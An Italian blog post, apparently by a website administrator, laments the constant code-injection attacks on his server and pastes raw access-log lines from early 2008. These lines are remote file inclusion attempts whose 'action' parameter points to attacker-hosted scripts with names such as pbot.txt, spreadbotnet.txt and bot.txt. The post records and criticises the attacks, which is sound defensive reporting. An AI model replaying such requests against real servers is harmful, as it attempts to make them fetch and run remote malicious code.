è da tempo ormai che mi diverto a loggare i vari tentativi di attacco sul server di UM, ce ne sono di vario tipo ma uno dei più comuni è il "code injection", si cerca cioè di far eseguire al server degli scripts che si trovano su altre macchine e che consentirebbero, una volta fatti girare sulla macchina vittima, di ottenere svariate informazioni oltre al fatto di poter poi usare la macchina vittima per attaccarne altre o per eseguire operazioni come ad esempio lo spamming delle caselle di posta con pubblicità varie, i tentativi di phishing...ecc...
mi rendo conto più passa il tempo, gli anni, che se una volta erano occasioni rare e poco diffuse, difficilmente il tuo server finiva nel mirino dei vari malintenzionati, oggi le cose hanno raggiunto ormai lo status di "inevitabile", cioè è inevitabile che il tuo server venga attaccato da qualcuno, prima o poi.
vi posto per farvi capire la situazione attuale, il log delle ultime giornate:
2008.02.29|03.15.20 -> IP:80.232.111.202 UA:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) RF:empty RU:/forum.php?board=&action=http%3A%2F%2Fsahel55.com%2Farticles%2Fomaduro%2Fkimumid%2F
2008.02.29|03.15.20 -> IP:80.232.111.202 UA:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) RF:empty RU:/forum.php?board=&action=http%3A%2F%2Fwww.elettrodataservice.it%2Ffoto_articoli%2Fonoda%2Fiyegimi%2F
2008.02.29|03.15.20 -> IP:80.232.111.202 UA:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) RF:empty RU:/forum.php?board=&action=http%3A%2F%2Fwww.municipioxii.it%2Fsunnyway%2Feheqebi%2Fjahibop%2F
2008.02.29|04.53.21 -> IP:80.237.154.50 UA:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) RF:empty RU:/index.php?action=http%3A%2F%2Fwww.altaiseer-eg.com%2Far%2Farticles%2Fjed%2Fumut%2F
2008.02.29|04.53.21 -> IP:80.237.154.50 UA:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) RF:empty RU:/index.php?action=http%3A%2F%2Fwww.electrofed.com%2F_app%2Fefc%2Fodoqu%2Fferus%2F
2008.02.29|04.53.21 -> IP:80.237.154.50 UA:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) RF:empty RU:/index.php?action=http%3A%2F%2Fwww.channelnewsperu.com%2Fimagenes%2Fpublicaciones%2Ffotos%2Fnepicu%2Fegul%2F
2008.02.29|13.34.31 -> IP:74.6.20.46 UA:Mozilla/5.0 (compatible; Yahoo! Slurp;
http://help.yahoo.com/help/us/ysearch/slurp) RF:empty RU:/index.php?action=cercomancanti
2008.02.29|14.05.13 -> IP:72.232.71.162 UA:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) RF:empty RU:/index.php?action=http%3A%2F%2Fwww.northfans.ch%2Fforum%2Fadmin%2Fsettings%2Fgucor%2Fujusu%2F&serie=aaaaaclf&pag=0
2008.02.29|14.05.13 -> IP:72.232.71.162 UA:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) RF:empty RU:/index.php?action=http%3A%2F%2Fwww.obrasmecanicasch.com%2Fomch%2Fimg%2Fitofu%2Fviroja%2F&serie=aaaaaclf&pag=0
2008.02.29|14.05.14 -> IP:72.232.71.162 UA:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) RF:empty RU:/index.php?action=http%3A%2F%2Fwww.electrofed.com%2F_app%2Fefc%2Fodoqu%2Fferus%2F&serie=aaaaaclf&pag=0
2008.02.29|15.49.32 -> IP:69.59.148.162 UA:Mozilla/3.0 (compatible; Indy Library) RF:empty RU:/index.php?action=http://www.xplproxysx.kit.net/cmdxkn.txt?
2008.02.29|16.44.43 -> IP:69.59.148.162 UA:Mozilla/3.0 (compatible; Indy Library) RF:empty RU:/index.php?action=http://www.xplproxysx.kit.net/cmdxkn.txt?
2008.02.29|19.55.40 -> IP:65.98.58.250 UA:curl/7.15.3 (i686-pc-linux-gnu) libcurl/7.15.3 OpenSSL/0.9.7a zlib/1.2.1.2 libidn/0.5.6 RF:empty RU:/index.php?action=http://realmc.net/hood/images/c.txt?
2008.03.01|07.57.46 -> IP:212.205.20.37 UA:Mozilla/3.0 (compatible; Indy Library) RF:empty RU:/index.php?action=http://ilegals.ifrance.com/enos???
2008.03.01|09.04.24 -> IP:212.205.20.37 UA:Mozilla/3.0 (compatible; Indy Library) RF:empty RU:/index.php?action=http://ilegals.ifrance.com/enos???
2008.03.01|19.19.00 -> IP:189.29.120.63 UA:Mozilla/3.0 (compatible; Indy Library) RF:empty RU:/index.php?action=http://realmc.net/hood/images/c.txt?
2008.03.02|04.01.11 -> IP:63.150.26.30 UA:Mozilla/3.0 (compatible; Indy Library) RF:empty RU:/index.php?action=http://www.freewebs.com/crew-master/pbot.txt
2008.03.02|09.20.51 -> IP:87.238.199.50 UA:empty RF:empty RU:/index.php?action=http%3A%2F%2Fxpl.fwhost.org%2Fteste.txt%3F%3F
2008.03.03|14.00.24 -> IP:201.50.21.101 UA:Mozilla/3.0 (compatible; Indy Library) RF:empty RU:/index.php?action=http://fagner.crewhosting.com/own.txt??
2008.03.03|15.53.07 -> IP:195.22.11.36 UA:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) RF:empty RU:/index.php?action=http%3A%2F%2Fwww.northfans.ch%2Fforum%2Fadmin%2Fsettings%2Fgucor%2Fujusu%2F&serie=aaaaaaaa&subserie=ag&codscheda=657
2008.03.03|15.53.07 -> IP:195.22.11.36 UA:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) RF:empty RU:/index.php?action=http%3A%2F%2Fhonamfishing.co.kr%2Fphpmysqladmin%2Flibraries%2Foduzov%2Fneloze%2F&serie=aaaaaaaa&subserie=ag&codscheda=657
2008.03.03|15.53.07 -> IP:195.22.11.36 UA:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) RF:empty RU:/index.php?action=http%3A%2F%2Fwww.felixtorresycia.com%2Fadmin%2Fcorreo%2Fenaq%2Fecib%2F&serie=aaaaaaaa&subserie=ag&codscheda=657
2008.03.03|22.43.40 -> IP:195.77.201.9 UA:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) RF:empty RU:/index.php?action=http%3A%2F%2Fhonamfishing.co.kr%2Fphpmysqladmin%2Flibraries%2Foduzov%2Fneloze%2F
2008.03.03|22.43.41 -> IP:195.77.201.9 UA:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) RF:empty RU:/index.php?action=http%3A%2F%2Fwww.northfans.ch%2Fforum%2Fadmin%2Fsettings%2Fgucor%2Fujusu%2F
2008.03.03|22.43.41 -> IP:195.77.201.9 UA:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) RF:empty RU:/index.php?action=http%3A%2F%2Fwww.northfans.ch%2Fforum%2Fadmin%2Fsettings%2Fgucor%2Fujusu%2F
2008.03.03|23.00.11 -> IP:189.29.71.212 UA:Mozilla/3.0 (compatible; Indy Library) RF:empty RU:/index.php?action=http://dosbr.fwhost.org/spreadbotnet.txt?
2008.03.04|16.27.05 -> IP:123.240.210.116 UA:Mozilla/3.0 (compatible; Indy Library) RF:empty RU:/index.php?action=http://www.pucorp.t5.com.br/lp.txt?
2008.03.04|18.19.18 -> IP:123.240.210.116 UA:Mozilla/3.0 (compatible; Indy Library) RF:empty RU:/index.php?action=http://www.pucorp.t5.com.br/lp.txt?
2008.03.04|18.48.42 -> IP:208.101.17.162 UA:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) RF:empty RU:/index.php?action=http%3A%2F%2Fwww.municipioxii.it%2Fsunnyway%2Feheqebi%2Fjahibop%2F
2008.03.04|18.48.42 -> IP:208.101.17.162 UA:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) RF:empty RU:/index.php?action=http%3A%2F%2Fwww.elettrodataservice.it%2Ffoto_articoli%2Fonoda%2Fiyegimi%2F
2008.03.04|18.48.43 -> IP:208.101.17.162 UA:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) RF:empty RU:/index.php?action=http%3A%2F%2Fwww.electrofed.com%2F_app%2Fefc%2Fodoqu%2Fferus%2F
2008.03.04|19.09.26 -> IP:123.240.210.116 UA:Mozilla/3.0 (compatible; Indy Library) RF:empty RU:/index.php?action=http://www.pucorp.t5.com.br/lp.txt?
2008.03.04|19.25.23 -> IP:189.31.131.43 UA:Mozilla/3.0 (compatible; Indy Library) RF:empty RU:/index.php?action=http://alonesystem.kit.net/tool.txt?
2008.03.04|19.26.02 -> IP:123.240.210.116 UA:Mozilla/3.0 (compatible; Indy Library) RF:empty RU:/index.php?action=http://www.pucorp.t5.com.br/lp.txt?
2008.03.04|23.43.55 -> IP:201.27.237.144 UA:Mozilla/3.0 (compatible; Indy Library) RF:empty RU:/index.php?action=http://icexb0x.xpg.com.br/bot.txt?
come potete vedere si cerca di trovare il modo per far eseguire al server degli scripts che si trovano su altri servers, molti di questi sono siti che sono stati attaccati con successo e che ora ospitano codice inserito da chi li ha attaccati, ad insaputa dei vari gestori del sito.
mano a mano che scrivo nei logs i vari tentativi ogni tanto vado a comunicare ai gestori del sito che nelle loro cartelle sono finiti dei files inseriti dall'esterno e che le loro macchine vengono attualmente utilizzate per attaccarne altre, ma mi rendo conto che è come lottare contro i mulini a vento... non ha senso, riesci a farne ripulire uno e ne arrivano subito altri dieci, senza contare poi che in molti casi non sanno di cosa stai parlando e ti ignorano completamente. Il problema è che non esiste una autorità preposta a ricevere le segnalazioni di questi tentativi fraudolenti, nessuno se ne occupa e questa "maleducazione", se così vogliamo chiamarla per essere buoni, dilaga senza freni.
poi ci si stupisce se le nostre caselle di posta sono intasate da messaggi in cui si cerca di venderci pilloline magiche varie o in cui veniamo avvisati che la nostra banca (che poi nel 99% dei casi non lo è) per motivi di sicurezza ci richiede di inserire utente e password su un sito che non è quello vero?
ma in che mondo virtuale viviamo? dove andremo a finire se nessuno fa niente per fermare questa valanga di informazioni fraudolente ?